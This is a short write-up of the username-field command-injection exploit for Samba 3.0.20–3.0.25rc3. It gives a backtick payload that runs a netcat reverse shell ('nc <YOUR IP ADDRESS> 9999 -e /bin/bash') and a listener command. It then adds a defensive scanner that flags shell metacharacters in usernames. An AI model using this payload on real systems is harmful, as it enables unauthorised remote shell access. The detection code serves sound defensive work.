Easy to read Python script for exploiting Samba versions 3.0.20 through 3.0.25rc3
The payload for this script lies in the user field. This particular version of Samba accepts metacharacters used in shell scripting for command-line execution: `` `command to run` ``. By inserting the backticks into the user field, one can execute any command on the target computer.

```python
user = "`" + "nc <YOUR IP ADDRESS> 9999 -e /bin/bash" + "`"
```

In my case I used netcat to gain a remote bash shell on the target computer. If you intend to do the same, make sure to set up a listening port to catch the bash shell. Example:

```
nc -lvp 9999
```
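
A defender-side check for the behaviour described above, as an added example that is not part of the original script: it flags username values that contain backtick or `$( )` command substitution, or other shell metacharacters. The record layout, sample values and function names are constructed for illustration and do not reflect a real Samba log format.

```python
import re

# A backtick pair or $( ... ) makes a shell run the enclosed text as a command,
# which is the behaviour the payload in the user field depends on.
SUBSTITUTION = re.compile(r"`[^`]*`|\$\([^)]*\)")

# Other characters a shell treats specially. Backslash and a bare "$" are left
# out on purpose: DOMAIN\user and machine accounts such as HOST01$ are
# legitimate SMB usernames and must not raise alerts.
OTHER_METACHARS = re.compile(r"[`;|&<>\n]|\$[({]")


def classify(username):
    """Return a verdict string for a suspicious username, or None if clean."""
    if SUBSTITUTION.search(username):
        return "command-substitution"
    if OTHER_METACHARS.search(username):
        return "shell-metacharacter"
    return None


def scan(records):
    """records: iterable of (source_address, username) pairs."""
    findings = []
    for src, user in records:
        verdict = classify(user)
        if verdict:
            findings.append((src, verdict, user))
    return findings


# Constructed sample records (assumed layout: source address, username field).
SAMPLE_RECORDS = [
    ("192.0.2.10", "alice"),
    ("192.0.2.11", "CORP\\bob"),
    ("192.0.2.12", "HOST01$"),
    ("192.0.2.66", "`echo test`"),
    ("192.0.2.67", "x$(echo test)"),
    ("192.0.2.68", "guest;ls"),
]

if __name__ == "__main__":
    for src, verdict, user in scan(SAMPLE_RECORDS):
        print(f"{src}\t{verdict}\t{user!r}")
```
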